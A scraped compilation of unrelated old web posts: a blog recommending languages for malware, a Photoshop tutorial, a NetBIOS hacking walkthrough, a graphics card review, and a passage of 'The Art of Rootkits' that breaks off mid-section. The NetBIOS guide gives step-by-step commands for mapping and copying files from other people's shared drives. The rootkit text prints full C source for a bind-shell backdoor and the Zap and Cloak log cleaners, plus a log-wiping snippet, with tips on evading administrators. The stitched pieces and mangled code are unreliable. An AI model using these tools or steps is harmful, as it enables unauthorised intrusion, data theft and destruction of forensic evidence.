What coding language should I pick to start coding spy programs?

What coding language should I pick to start coding spy programs?
What coding language should I begin with? - May 25th 2008 -
Author: caesar2k

That's the question I hear most:
What coding language should I pick to start coding spy programs?
By experience, I started with Visual Basic 5, in 1999. Even though I didn't use Windows APIs (Application Programming Interface) I liked the easiness that coding in VB5 was. But you can't go much further without using Windows API, that's what spy programming is all about. With the APIs you will be able to code virtually anything (no pun intended). I found later that VB COULD call APIs, then I changed to VB 6. I managed to make my first "internet" programs, like Ghostvoice. It was connecting to an IP, sending and receiving data! But I was using 2 API calls, and the rest, I relied in VB OCX controls, Winsock + direct speech. Yuck, if the remote computer doesn't have the OCX or even, the VB runtimes, your program will CHOKE, by the means, it won't even start.
So I saw that VB wasn't really my thing, and fastly moved to Delphi 5, and since then I settled forever. Delphi makes it perfect for malware coding, since you don't need any external requirements, only it being Windows OS. It's basically APIs all over, you won't be doing anything else, apart from the VCL, that is a wrapper for visual Windows API, like CreateWindow(), SetForegroundWindow(), ShowWindow(), CallWndProc(), etc. Delphi is pretty easy to learn and it's very intuitive.
It's almost like talking to the code, where you want a piece of code that does something, you do:

procedure DoMyStuff(var MyStuff);

As you can see, there are BEGIN and END blocks, code that doesn't return a value are "PROCEDURE"'s and code that return a value are "FUNCTION"'s. So, before anybody ask, yes I would for sure recomend you starting with Delphi. Then after you grasp your handles with Delphi (pun intended) you can move to C++, and who knows, an ASM compiler such as FASM or NASM (my favorite).
By now, I would not recomend .NET (any 'sharp' language), since it also relies on a framework, that needs to be pre-installed on the computer.
Get coding, you can even try a free IDE called Lazarus, that is for Object Pascal, at


how to make lightning flash

how to make lightning flash
how to make lightning flash

(note- you need the lightning brushes for this trick, check it out at deviantart)

1) first make a background (a dark one is preferable.)


2) make a new layer, and add a lightning brush


(if you want, you can remove some of the glow and lower the opacity.)

3) once your satisfied, his ctrl+shift+m to animate. Something like this should show up.


4) Then go to the animation menu. (if it doesn’t appear go to windows>animation.)


5) Then make the lightning image invisible.


6) Then duplicate the layer and make the lightning visible in that slide.


7) Duplicate the lightning layer and make it invisible. Then select the lightning slide and press the tweening button.


Cool A screen like this should pop up, select these settings.


9) Now repeat the process, only this time make a delay of 0.1-0.3 seconds on the slide with the lightning. You should get something like this.


10) Now go back to the first slide and give it a 1-10 second delay so that it’s realistic. Press play to test it out.


Here’s what I got.


Now use that animation technique on different backgrounds and with different settings.



-What is it?-

NetBIOS Hacking is the art of hacking into someone else's computer through your computer. NetBIOS stands for "Network Basic Input Output System." It is a way for a LAN or WAN to share folders, files, drives, and printers.

-How can this be of use to me?-
Most people don't even know, but when they're on a LAN or WAN they could possibly have their entire hard drive shared and not even know. So if we can find a way into the network, their computer is at our disposal.

-What do I need?-
Windows OS
Cain and Abel - get it from here - http://www.oxid.it/

-[Step 1, Finding the target.]-++++++++++++++++++++++++++++++++++++++++++++++++++
So first off we need to find a computer or the computer to hack into. So if your plugged in to the LAN, or connected to the WAN, you can begin. Open up Cain and Abel. This program has a built in sniffer feature. A sniffer looks for all IP addresses in the local subnet. Once you have opened up the program click on the sniffer tab, click the Start/Stop sniffer, and then click the blue cross

-What is it?-
NetBIOS Hacking is the art of hacking into someone else's computer through your computer. NetBIOS stands for "Network Basic Input Output System." It is a way for a LAN or WAN to share folders, files, drives, and printers.

-How can this be of use to me?-
Most people don't even know, but when they're on a LAN or WAN they could possibly have their entire hard drive shared and not even know. So if we can find a way into the network, their computer is at our disposal.

-What do I need?-
Windows OS
Cain and Abel - get it from here
-[Step 1, Finding the target.]-++++++++++++++++++++++++++++++++++++++++++++++++++

So first off we need to find a computer or the computer to hack into. So if your plugged
in to the LAN, or connected to the WAN, you can begin.
Open up Cain and Abel. This program has a built in sniffer feature. A sniffer looks for
all IP addresses in the local subnet. Once you have opened up the program click on the
sniffer tab, click the Start/Stop sniffer, and then click the blue cross

Another window will pop up, make sure "All host in my subnet" is selected, and then click ok.

It should begin to scan.

Then IP's, computer names, and mac addresses will show up.
Now remember the IP address of the computer you are going to be breaking into.
If you can't tell whether the IP address is a computer, router, modem, etc, that's ok.
During the next step we will begin our trial and error.

-[Part 2, Trial and Error]-

Now, we don't know if we have our designated target, or if we have a computer or printer, or whatever else is on the LAN or WAN.
If you did get the IP of the target though, I still recommend reading through this section, for it could be helpful later on.
Click on the start menu and go to run, type in cmd, and click ok.
This should bring up the command prompt.
From here we will do most of the hacking.
Now I will be referring to certain commands that need to be inputted into the command prompt.
I will put these commands in quotes, but do not put the quotes in the code when you type it into the prompt.
I am only doing this to avoid confusion.
Let's get back to the hacking.
Type in "ping (IP address of the target)." For example in this tutorial, "ping"
This will tell us if the target is online.
If it worked, it will look something like this (note, I have colored out private information):

IF it didn't work, meaning that the target is not online, it will look something like this:

If the target is not online, either switch to a different target, or try another time. If the target is online, then we can proceed.

-[Part 3, Gathering the Information.]-

Now, input this command "nbtstat –a (IP address of target)." An example would be "nbtstat –a"
This will show us if there is file sharing enabled, and if there is, it will give us the: currently logged on user, workgroup, and computer name.

Ok, you're probably wondering, "What does all this mean to me?" Well, this is actually very important, without this, the hack would not work. So, let me break it down from the top to bottom. I will just give the first line of information, and then explain the paragraph that follows it.

The information right below the original command says: "Local Area Connection," this information tells us about our connection through the LAN, and in my case, I am not connected through LAN, so the host is not found, and there is no IP.

The information right below the "Local Area Connection," is "Wireless Network Connection 2:" It gives us information about the connection to the target through WAN. In my case I am connected through the WAN, so it was able to find the Node IpAddress. The Node IpAddress is the local area IP of the computer you are going to break into.

The NetBIOS Remote Machine Name Table, give us the workgroup of our computer, tells us if it is shared, and gives us the computer name. Sometimes it will even give us the currently logged on user, but in my case, it didn't. BATGIRL is the name of the computer I am trying to connect to. If you look to the right you should see a <20>. This means that file sharing is enabled on BATGIRL. If there was not a <20> to the right of the Name, then you have reached a dead end and need to go find another IP, or quit for now. Below BATGIRL is the computers workgroup, SUPERHEROES. If you are confused about which one is the workgroup, and the computer, look under the Type category to the right of the < > for every Name. If it says UNIQUE, it is one system, such as a printer or computer. If it is GROUP, then it is the workgroup

-[Step 4, Breaking In]-

Finally it's time.
By now we know: that our target is online, our target has file sharing, and our target's computer name.
So it's time to break in.
We will now locate the shared drives, folders, files, or printers. Type in "net view \\(IP Address of Target)"
An example for this tutorial would be: "net view \\

We have our just found our share name. In this case, under the share name is "C," meaning that the only shared thing on the computer is C. Then to the right, under Type, it says "Disk." Thismeans that it is the actual C DISK of the computer. The C DISK can sometimes be an entire person's hard drive.

All's that is left to do is "map" the shared drive onto our computer. This means that we will make a drive on our computer, and all the contents of the targets computer can be accessed through our created network drive. Type in "net use K: \\(IP Address of Target)\(Shared Drive). For my example in this tutorial, "net use K: \\\C." Ok, let's say that you plan on doing this again to a different person, do u see the "K after "net use?" This is the letter of the drive that you are making on your computer. It can be any letter you wish, as long as the same letter is not in use by your computer. So it could be "net use G...," for a different target.

As you can see, for my hack I have already used "K," so I used "G" instead.

You may also do the same for multiple hacks.
If it worked, it will say "The command completed successfully."
If not, you will have to go retrace you steps.
Now open up "my computer" under the start menu, and your newly created network drive should be there.

Now, if you disconnect from the WAN or LAN, you will not be able to access this drive, hence the name Network Drive.
The drive will not be deleted after you disconnect though, but you won't be able to access it until you reconnect to the network.
So if you are doing this for the content of the drive, I recommend dragging the files and folders inside of the drive onto your computer,
because you never know if the target changes the sharing setting.
If you are just doing this to hack something, then go explore it and have some well deserved fun!


The Geforce 9600GT 512 Mb Reviewed

The Geforce 9600GT 512 Mb Reviewed

Geforce 9600GT 512 Mb

Last month the first in the new NVIDEA 9000 series was launched. The GeForce 9600GT 512 Mb is the first of this new line that saw the light.

This new line of has to replace the whole NVIDIA assortment before summer. It's six moths ago that we had our first view of the 8000 series, so things are moving quickly at this company

We tested the first sibling in this new range of graphics cards the 9600GT. In itself the fact the NVIDIA made the debut with the 9600GT model is unique. Mostly the high end super gaming monsters are the first to see the light. This is a middle class model but has is build around the new G94 GPU, and will be one of the few cards featuring this chip. Both the 9800GT and 9800GTX will be based on the G92 GPU.

The overall design is no revolution. Improvements in performance are great, and the price/quality ratio has gone up. But from a technical point of view there is not much new under the sun.

Both the G94 and G92 GPU's don't support DirectX 10.1 like their competitor Ati Radion with the 3000 series. If this lack of support is a great drawback remains to be seen. Their are no games supporting 10.1 and since the shelf life of a graphics card in the gaming sector is less than 6 months we need not be overcritical at this point.

Both GPU's support PCI 2.0 and Pure Video 2 ( we had already seen this in the G84 and G86). But the new cards are cheaper, faster and have a better energy efficiency.

Although the 9000 series is not the most innovative, fact remains that they are interesting cards. If we compare the new GT9600 with the GT8600 (based on the G84 GPU).

The 9600 stands out with an 256 bits memory bus, while the 8600 had to work with half that amount, 128 bits. That this increase has pronounced effect on the performance stands to reason.

Where the GeForce 8600 had a maximum bandwidth of 32GB/sec the 9600 is capable of 57.6 GB/sec. Further the number of shader processors is doubled compared to the GPU84.

The clock of the 64 unified shaders increased from 1450 Mhz, to 1625 Mhz. The conclusion of this move is that Nvidea now has found a healthy balans between GPU power and memory bandwidth.

The 9600GT has two Dual-Link DVI connections, both HDCP capable. Dell is the only manufacturer that has a display capable of utilizing that possibility with their 24 Inch 2408WP and 30 Inch 3008WFP. Other companies promised to come with compatible models later this year.

Decoding HD imagery is no problem, so blue ray enthusiasts can rest assured. The GT9600 can be placed in double SLI. and beats its competitor the HD 3870 from Ati Radeon on all fronts. Tripple SLI is not possible but we have the feeling that not many of the potential buyers of this card will be interested in such a feature.

A comparison table for different games and resolutions can be found on our site. A strange phenomenon is that the overall energy consumption of the HD3870 X2 is higher with less performance.

To wrap it up, we think that a complete new line in 6 months time is a bit overdoing it, but that NVIDIA did a good job with the Geforce 9600GT 512 Mb. The great never seen before price/performance ratio is the and the consistent beating of the 3870 from Ati makes this card a great choice for the demanding but not overly fanatic gamer.

As soon as we can lay our hands on the 9800 models with will very happy to give them a good spin and find out what their extremes are. With our strange inclination we love to put new cards on the torture table.


The Art of Rootkits

The Art of Rootkits

1 - What is a root kit?

A rootkit is a program. Rootkits come in all different shapes and styles, some more advance than others. Rootkits are basically programs that help attackers keep their position as root. Notice it's called a "rootkit". 'root' meaning the highest level of administration on *nix based systems and 'kit' meaning a collection of tools. Rootkits contain tools which help attackers hide their presence as well as give the attacker full control of the server or host continuously without being noticed.
Rootkits are usually installed on systems when they have been successfully compromised and the highest level of access has been given (usually root) Some rootkits refuse to be installed until the attacker has root access, due to read and write permission to certain files. Once the system has been successfully compromised and the attacker has root, he\she may then install the rootkit, allowing them to cover their tracks and wipe the log files.
A typical rootkit consists of the following utilities (Note: We will look at these in a lot more detail later on):
  • Backdoor Programs - login backdoors, telnetd etc
  • Packet Sniffers - Sniff network traffic such as FTP, TELNET,POP3
  • Log-Wiping Utilities - Bash the logs to cover tracks
  • DDoS Programs - Turn the box into a DDoS client (Remember trinoo?)
  • IRC\Bots - Bots used to take over IRC channels (Lame and annoying)
  • Miscellaneous programs - May contain exploit, log editor
(Don't worry to much if you don't understand any of the above, as I said were look at this all in a lot more detail further down)

2 - Hacker Jargon Definition

Oh Hail the mighty hacker jargon!

This is what the "Hacker Jargon" says about the word "rootkit"...

"rootkit: /root�kit/, n.
[very common] A kit for maintaining root; an automated cracking tool. What script kiddies use. After a cracker has first broken in and gained root access, he or she will install modified binaries such as a modified version login with a backdoor, or a version of ps that will not report the cracker's processes). This is a rootkit."

Wow! that's amazing! We worship you hacker jargon! Thank you ever so much for explaining to me what a rootkit is!

Remember kidz, all you have to do is read out some cool urban HaX@r words out the jargon to your friends and they will think your really c00l! and 1337! ;-)

3 - Hackers or the Kids?

Now the question you are probably asking yourself is "Is a rootkit a hackers tool or just another script kiddies tool?" (Well, you may not be thinking that, maybe I just suck and my psychology skills are as good as yours..) Well, the "Hacker Jargon" defines a rootkit and a script kiddies tool and to some extend he\she\they\IT is right (The jargon is always right)

Rootkits don't really require that much skill to run or use. Most rootkits can be compiled like this...

gcc t0rn.c -o rootkit



(Now obviously when compiling all "hacker" tools you need to chose a name which disguises it's purpose, so rootkit would be a really stupid choice)

However there are some rootkits that require more skill to run and use. Some rootkits require you to edit the source code before it's compiled and some even need you to edit the iptables and kernel. (Very advance ones, they used one at the "Black Hat Conference" in 2002)

So, rootkits are used by both hackers and script kiddies. I personally believe that a hacker would have to write his own rootkit to call himself a hacker not just run and use someone else code. (However that�s just my opinion, so don't hold me to that!)

4 - Who uses rootkits and why?

I have already really covered this in the previous sections, however for the forgetful types I shall explain again, just to summaries up what we have learnt so far...

Hackers and script kiddies use rootkits, they use them to maintain root and cover their tracks. Script kiddies lack knowledge of *how* a rootkit really works and most often they will end up deleting key binary files. (Basically, script kiddies will let you know when they have compromised your system)

Rootkits are only installed when the system has been compromised and root has been gained.

I don't really want to go into any more detail, because I'll end up just repeating myself. Lets just move on...

5 - The Language rootkits are coded in

Hmmm, well this isn't going to be short...
Most rootkits are coded in C or Assembly (Shell code). Most of the well-known rootkits are coded in C so the attacker can edit the source code to fit its target specification. (E.g. The logs files could be stored in a different location)

6 - Different types of rootkits

At the current time of writing there are 2 main types of rootkits.

Application rootkits - Established at the application layer
Kernel rootkits - Established at the kernel level (Core of any OS)

When I say "established" this could be referred to of where exactly the rootkit hides. Now lets start of my looking at an application rootkit.

An application rootkit is basically a rootkit which "replaces" all the well know system binary files (ls, netstat, killall) with "fake" or "Trojanned" ones. The trojanned or fake system files will help hide the attackers presence, report false information to the system administrator and even provide a Backdoor for the attacker. To help you understand this more I have provided a list of all the typical system files, which are "replaced" to, help the attacker cover his or her tracks. The list was taken from "Rootkit: Attacker Undercover Tools" by Sailman Manap.


Programs replace to hide attacker presence.

  • "ls", "find", "du" - Trojaned system file will be able to hide attackers file, directory and stuff that have been brought into the system from being listing.
  • "ps", "top", "pidof" - All these programs are process monitor program. Trojaned program will hide attacker process from being listing.
  • "netstat" - netstat is used to check network activity such as open port, network connections establish and listening. Trojaned netstat will hide processes installed by attacker such as ssh daemon or other services.
  • "killall" - Trojaned "killall" will not be able to kill attacker process.
  • "ifconfig" - When sniffer is running PROMISC flag is set to the nic. "ifconfig" is a handy utility to set and to view setting of ethernet nic. Trojaned "ifconfig" will not display the PROMISC flag when sniffer is running. This is useful to hide sniffer from being detected.
  • "crontab" - Trojaned "crontab" will hide the attacker�s crontab entry.
  • "tcpd", "syslogd" - Trojanised "tcpd" and "syslog" will not log any connection made by attacker. "tcpd" also capable to bypass tcp wrapper enforcement.


Hopefully, that would should have given you a better idea of what an Application is. Remember, this section has only be written so you can distinguish the differences between a "Application" rootkit and "Kernel" rootkit. Lets now take a look at a Kernel rootkit.

A Kernel rootkit is a rootkit that buries itself deep in the Kernel. This makes it extremely hard to detect and remove. Kernel rootkits are more advance then Application rootkits, A Kernel rootkit works by exploiting and manipulating Kernel capabilities. Now I don't really want to go in much more detail on Kernel rootkits because they can get quite advance (Well, they ARE) were talk about them later in this file, it may also help to look at "2.7 - How the kernel works" to get a feel for these Kernel rootkits...

It's now time to move on. In the next section (Section 2) We look at all the elements which make up a rootkit, such as a Backdoor, Sniffer, log basher etc Half way through section 2 we will then look at "Kernel Rootkits" in more detail.

7 - Backdoors

Most of todays (decent) rootkits contain "Backdoors". Now you should all know what a Backdoor is but just in case you didn't I will quickly give a brief explanation of all.

Backdoor - A program or script which allows an attacker to establish some form of privilege and remote communication without logging into the system. Backdoors are usually installed when the system has been successfully compromised and some form of exploit has been entailed. The advantage of installing a backdoor on a system means that the attacker doesn't have to keep using the same exploit over and over again. The disadvantage of installing a backdoor means at one point or another the system administrator will notice suspicious activity in his network traffic, if he or she were to run a port scanner such as Nmap (Coded by Fyodor http://www.insecure.org) he or she would soon uncover an open port and sooner or later remove the backdoor.
A typical example of a Windows NT\2000 backdoor is one entitled "Tini.exe" (Made by NTSecurity) This little program listens on port 7777 for incoming connections, once a connection has been established a remote command shell is executed for the attacker who establishes the connection. (Now as I have mentioned this t-file generally deals with *nix backdoors, so I don't really want to get side stepped talking about windows backdoors, exploits etc I thought I'd just mention tini.exe to give you a general idea of what a Backdoor consists of.

Now lets talk more about *Nix backdoors. *nix backdoors come in *many* shapes and sizes. The paper by Sailman Manap gives yet another long comprehensive list of all the forms backdoors come in...


  • Login Backdoor - Modifying login.c to look for backdoor password before stored password. Attacker can log into any account using backdoor password.
  • Telnetd Backdoor - Trojaned the "in.telnetd" to allow attacker gain access with backdoor password.
  • Services Backdoor - Replacing and manipulate services like "ftp", "rlogin", even "inetd" as backdoor to gain access.
  • Cronjob backdoor - Backdoor could also be added in "crontjob" to run on specific time for example at 12 midnight to 1 am.
  • Library backdoors - Almost every UNIX and Windows system have shared libraries. Shared libraries can be backdoor to do malicious activity including giving a root or administrator access.
  • Kernel backdoors - This backdoor is basically exploiting the kernel, which is core of the operating system to handle and to hide backdoor effectively
  • Network traffic backdoors which typically using TCP, UDP, and ICMP - Backdoor that exploiting network traffic protocol is widely used. In TCP protocol backdoor like ssh is popularly used because it communicate in encrypt, while crafting and tunneling packet In UDP and ICMP traffic will give a better chances escaping from firewall and "netstat".


All of these and any other forms of *nix backdoors are explained and documented by Christopher Klaus, his paper can be
Reached at http://secinf.net/info/unix/backdoors.txt, I strongly recommend you check it out if you are either really interested in Backdoors or you still haven�t grasped the basic concepts of Backdoors. I have also written a small file on Backdoors entitled "A Crash Course in Backdoors" it is available at http://www.invisibleghosts.net
To finish of this section on backdoors, I feel like adding some source code. (This is a basic TCP Backdoor for *nix if you don't own a copy of linux or unix don't even attempt to compile this ;-)
I did not write this, shaun2k2 did, so please give ALL credit for the below source code to him.
/* backdoor.c - basic unix tcp backdoor.
* This is a basic UNIX TCP backdoor.  /bin/sh is binded to the port of your
* choice.  Access the shell with telnet or netcat:
* root# nc -v hackedhost.com 1337
* I do not take responsibility for this code.

#define BACKLOG 5
#define SHELL '/bin/sh'

void usage();

int main(int argc, char *argv[]) {
if(argc <2) {

int sock, csock;
struct sockaddr_in client;
struct sockaddr_in mine;
if((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
printf('Couldn't make socket!\n');      exit(-1);

mine.sin_family = AF_INET;
mine.sin_port = htons(atoi(argv[1]));
mine.sin_addr.s_addr = INADDR_ANY;
if(bind(sock, (struct sockaddr *)&mine, sizeof(struct sockaddr)) == -1) {
printf('Could not bind socket!\n');

if(listen(sock, BACKLOG) == -1) {
printf('Could not listen on socket!\n');

printf('Listening for connections on port %s!\n', argv[1]);

while(1) {
int sin_size;
sin_size = sizeof(struct sockaddr);
csock = accept(sock, (struct sockaddr *)&client, &sin_size);
dup2(csock, 0);
dup2(csock, 1);
dup2(csock, 2);
execl('/bin/sh','/bin/sh',(char *)0);

void usage(char *progname[]) {
printf('Usage: %s \n', progname);
The main purpose of me showing you this source is to give you a general idea of what a rootkit consists of. Remember rootkits come in many shapes and sizes and every rootkit is most likely to contain some form of Backdoor...
So what else do rootkits contain apart from Backdoors? Lets move on to the next section and look at "Sniffers".
8 - Sniffers

A lot of today�s rootkits contain programs known as "Sniffers". What are Sniffers? (Also known as Packet Sniffers) Basically packet Sniffers are programs that are made to "Monitor" network traffic, TCP\IP or any other network device. I'm sure you know when you are browsing the Internet or playing online games "Packets" of data are going to and from your Computer. Attackers install Sniffers so they can capture valuable information which is floating to and from your computer.

What type of valuable information? Here is a list of what a Sniffer is capable of...

  • Sniffing FTP passwords
  • Sniffing Telnet passwords
  • Sniffing Network passwords
  • Sniffing POP3 passwords
  • Capturing websites you have visited
  • Sniffing Gateways
  • Lots more

Some of you may be thinking "Won't my passwords been encrypted as they are passing over my network?" To some extent this is true, some services provide encryption (Such as E-mail if you were using PGP sniffing would be useless, unless of course your a good cryptographer) Other services such as ftp and telnet transfer their passwords in plain text, so it would be easy for an attacker to just capture the packet then dump it into a text editor (such as "vi", "Pico" or for M$ notepad) it would only take a couple of minutes for an attacker to uncover the plain text password.

Now there is a technical side to Sniffers that I don't really want to go into. For more information on Sniffers please read http://www.sans.org/infosecFAQ/switchednet/sniffers.htm this paper was written by a "Jason Drury" and I have found it most useful. If you are more interested in Windows Sniffers then I can recommend getting a copy of the following....
  • Windows Sniffer
  • TcpDump
  • Password Capture --------> Made especially to sniff passwords
  • Sniff
  • Ethereal
  • EtherPeep
My personal favorite Sniffer for Windows has to be TCPDump it's command line driven so the scripties wouldn't go near it but for those truly interested in the elements of computer hacking I would recommend TCPDump, it will take time getting used to it but its worth it.
Now what about linux sniffers.. Hmmmm I'll be honest with you I haven�t had much experience using linux Sniffers, but I have been told there are some good tutorials on how to make your own Sniffer for *nix on http://www.planetsourcecode.com, however before you even attempt to make your own I strongly recommend you get into socket programming. If you want a read made Sniffer just google for one, a common one is "linsniffer.c"
Anyway back to the main point, most rootkits DO sometimes contain "ready to run" Sniffers and Sniffers are hard to detect once they are running. (Were look at this a little later) The purpose of this section was just to show you WHAT a Sniffer is.. Now you know lets move on :-)
9 - Cleaners (Log Bashers)

Ah, we come to something a lot simpler, Log Bashers :-) (Also known as Log deleters, Log killers and Log Cleaners)

No matter what the title they all do the same thing. Delete system log files. System Administrators rely on logging as an extra form of security. Log files can keep track on who logged in last and at what type, what programs were run as that user was logged in etc etc. Therefore it is exceptionally important for the attacker to destroy ALL traces of log files. Now, some of you may be thinking:

"If all the Log files are deleted won't this give an indication to the system administrator that there box has been hacked?"

If you are thinking that, then your dead right. Deleting the log files can sometimes be pretty stupid, the best way to get around the log files is to "edit" the entries by deleting your entries and filling in some false ones (Sometimes this requires root access, but if your running a log cleaner of a rootkit you should already have root :-)

Another way around this is to delete the whole log file then to "re-create" them. Here is a VERY simple script I made to demonstrate what I mean...


int main() system("rm-rf /root/logs/LastEntry.log"); touch(" /root/Logs/LastEntry.log"); return 0;


Now for those who don't know any C then I shall I explain. The first main line of the code is telling the C program to remove the file LastEntry.log, delete it. The second line is telling the program to create a file called LastEntry.log in the exact same location. So when the system administrator opens the log file he will be confronted with a blank file. (This may be a bit stupid because if the admin is security minded he will know the system has been compromised. Some stupid admins see it as a 'Bug' therefore you get away with it.)

Most rootkits contain some form of log-cleaner, but before you execute it you need to make sure you know exactly HOW it works, otherwise your just another script kiddie who "presumes" this tool will cover your tracks completely. Some log cleaners search certain directories for words like "IP" "Login", "Logs", "Log" etc and then delete them. Some just delete all the default log files that are in the default system location. Before you compile a rootkit learn C and take a look at the source code you may find you need to edit some of the entries. It's important you come FULLY prepared before you go out and install your rootkit.

I'll tell you now, I have been in this game long enough to realize even if you successfully edit\Delete a bunch of log files it doesn't mean you are untraceable. You still need to think about system programs which are running, which may have their own logging capabilities. Look out for IDS (Intrusion Detection Systems) such as SNORT and look out for programs like Tripwire and any other security programs which monitor\analyze system security.

As more and more people become security minded so do there software and "security awareness" system administrators are getting clever, so be careful!

I'll end this section now with some source for some well known log cleaners, I would strongly recommend not using them though, since they are fairly old. I'm only using them to show you what typical log cleaners are (used to be) like. Just because they are old though doesn't mean they don't work ;-) I'm just pretty sure if you Google about you can find MUCH better ones.

This is a very old log cleaner called "Zap" the source code is below..


#define WTMP_NAME '/usr/adm/wtmp'
#define UTMP_NAME '/etc/utmp'
#define LASTLOG_NAME '/usr/adm/lastlog'

int f;

void kill_utmp(who)
char *who;
struct utmp utmp_ent;

if ((f=open(UTMP_NAME,O_RDWR))>=0) {
while(read (f, &utmp_ent, sizeof (utmp_ent))> 0 )
if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {
bzero((char *)&utmp_ent,sizeof( utmp_ent ));
lseek (f, -(sizeof (utmp_ent)), SEEK_CUR);
write (f, &utmp_ent, sizeof (utmp_ent));

void kill_wtmp(who)
char *who;
struct utmp utmp_ent;
long pos;

pos = 1L;
if ((f=open(WTMP_NAME,O_RDWR))>=0) {

while(pos != -1L) {
lseek(f,-(long)( (sizeof(struct utmp)) * pos),L_XTND);
if (read (f, &utmp_ent, sizeof (struct utmp))<0) {
pos = -1L;
} else {
if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {
bzero((char *)&utmp_ent,sizeof(struct utmp ));
lseek(f,-( (sizeof(struct utmp)) * pos),L_XTND);
write (f, &utmp_ent, sizeof (utmp_ent));
pos = -1L;
} else pos += 1L;

void kill_lastlog(who)
char *who;
struct passwd *pwd;
struct lastlog newll;

if ((pwd=getpwnam(who))!=NULL) {

if ((f=open(LASTLOG_NAME, O_RDWR)) >= 0) {
lseek(f, (long)pwd->pw_uid * sizeof (struct lastlog), 0);
bzero((char *)&newll,sizeof( newll ));
write(f, (char *)&newll, sizeof( newll ));

} else printf('%s: ?\n',who);

int argc;
char *argv[];
if (argc==2) {
} else


Here is another little log cleaner called Cloak v1.0 it wipes your presence on SCO, BSD, Ultrix, and HP/UX UNIX. This program is *old* and was written by Wintermute of -Resist-.


/* UNIX Cloak v1.0 (alpha)  Written by: Wintermute of -Resist- */
/* This file totally wipes all presence of you on a UNIX system*/
/* It works on SCO, BSD, Ultrix, HP/UX, and anything else that */
/* is compatible..  This file is for information purposes ONLY!*/

/*--> Begin source...    */

main(argc, argv)
int     argc;
char    *argv[];
char    *name;
struct utmp u;
struct lastlog l;
int     fd;
int     i = 0;
int     done = 0;
int     size;

if (argc != 1) {
if (argc >= 1 && strcmp(argv[1], 'cloakme') == 0) {
printf('You are now cloaked\n');
goto start;
else {
printf('close successful\n');
else {
printf('usage: close [file to close]\n');
name = (char *)(ttyname(0)+5);
size = sizeof(struct utmp);

fd = open('/etc/utmp', O_RDWR);
if (fd < 0)
else {
while ((read(fd, &u, size) == size) && !done) {
if (!strcmp(u.ut_line, name)) {
done = 1;
memset(&u, 0, size);
lseek(fd, -1*size, SEEK_CUR);
write(fd, &u, size);

size = sizeof(struct lastlog);
fd = open('/var/adm/lastlog', O_RDWR);
if (fd < 0)
else {
lseek(fd, size*getuid(), SEEK_SET);
read(fd, &l, size);
l.ll_time = 0;
strncpy(l.ll_line, 'ttyq2 ', 5);
gethostname(l.ll_host, 16);
lseek(fd, size*getuid(), SEEK_SET);


10 - Rootkit Extra Utilities

I will try and keep this section short due to there isn't really that much to say. As you should know by now and as I have mentioned rootkits come in all shapes and styles. Some rootkits are well known for their advance log cleaner, others for their advance Backdoor and others for their advance, stealth hard to remove installation procedure. There are some rootkits which are well known for being SAR (Swiss Army Rootkits) basically, they are rootkits with average features plus a whole load of extra utilities such as Bots, DdoS, Extra scripts, Password crackers, Killer scripts etc

Rootkits that contain scripts that cause DDoS attacks are considered dangerous; if an attacker were to exploit 100's of servers and install such a rootkit those servers would then become "Zombies" they could launch DDoS attacks (SYN, PING, FINGER, UDP, TCP) against chosen targets. Rootkits are continuously being made more advance and extra utilities are being added on each time. In the future I personal predict that rootkits will be a major threat to national security.......

That�s really all I have to say for this section. Lets move on.

11 - Kernel Rootkits (More Detail)

We have already briefly looked at "Kernel Rootkits" but we haven�t really looked at them in close detail. In this section I plan to analyze and expose the basics of a kernel rootkit. If you�re not to sure on what the "Kernel" is I recommend you skip this section and move onto the next section (2.5) then come back to this section when you feel that you are ready.

The best way to start of this section is talk about how Kernel rootkits actually work. Kernel rootkits work, basically by exploiting LKM. (Loadable Kernel Modules)LKM are used to load device drivers on a "as-needed" bases. LKM are usually only exploited so the attacker can perform malicious activity.

Kernel rootkits are way more dangerous than Application rootkits because instead of just replacing the basic binaries like "ls" and "netstat" they attack the kernel directly and manipulate system-calls like open() and read(). As we know application rootkits replace binaries, if the administrator was clever and analyzed the actual binaries which had been replaced they will realize the differences in size (e.g. the program could contain an extra 128 bytes) However, this wouldn't be possible with Kernel rootkits because instead of actually changing the size and structure of the program, they just change the way the program operates. For example programs like "ps" use an open system call "open()" and reads information from files in the directory /proc, where also the information about running processes is kept.

For more information on rootkits and to mess about with typical examples of each rootkit type... Considering obtaining a copy of..

Application rootkit - t0rn Kernel rootkit - Adore (Also known as LKM-Adore)

12 - How the Kernel Works

This will be a very basic and very short section and is only here to help those understand how the Kernel works. What is a Kernel? In English and using non-technical jargon a Kernel is basically the "Core" of the OS (Linux, Unix, Windows). Without the Kernel an Operating System could not load.

The Kernel is one of the first things which load in a OS and it remains in the main memory. Since it's staying in the main memory its *very* important for the Kernel to be as small as possible, but at the same time be able to provide all the essential programs, services, devices, applications and drivers for the OS. Typically, the kernel is responsible for I/O(Input and Output) management, Device drivers, CPU management, process and task management, and disk management.

The kernel looks something like this....

|Applications and |        - LKM - System Calls
|_Programs_ _ _ _ |
*  MAIN KERNEL    *        - Consists of:  Memory Management
*                 *                        I\O Management
*******************                        CPU Management
|    Hardware      |                       Device Drivers
|_ _ _ _ _ _ _ _ _ |

Understand? Quite simple really...

13 - Analyzing an Application Rootkit "T0rnkit"

This is a professional analysis of the rootkit "T0rn" this was taken of off Mcaffe's main site.

"T0rnkit attempts to hide its presence when installed. During installation it first shuts down the system-logging daemon, syslogd. It then replaces several other system executables with trojanized versions and adds a trojanized ssh daemon to the system as well. Programs that are replaced are, among others; du, find, ifconfig, login, ls, netstat, ps, sz and top. If the system administrator uses these somewhat vital functions they report normal looking information, but the processes and network connections that the hacker uses aren't shown. Finally T0rnkit starts a Sniffer in background, enables telnetd, rsh and finger daemons in "/etc/inetd.conf", restarts inetd to activate changes made and starts syslogd again. This all without the system administrator knowing about it. Noteworthy is that all new programs in the t0rnkit all have the exact size of 31.336 bytes. T0rnkit usually can be found in the directory /usr/src/.puta, but of course not if it already has been activated because the command 'ls' will have been replaced. With the standard installation of t0rnkit TCP port 47017 is open for root access to the system. A modified version of this rootkit was also distributed by a variant of Unix/Lion worm.

A system administrator that is a little bit into the security world can find a with t0rnkit infected system pretty fast because of the change in file sizes and a simple port scan will reveal the open port, but funny enough most people don't have this 'expertise' "

14 - A variety of hiding methods

To finish off section two, I will give you some tips that I have found to be useful when hiding certain features of a rootkit e.g. Backdoor, Sniffer etc)

Lets start by reviewing ways to successfully hide the actual rootkit...

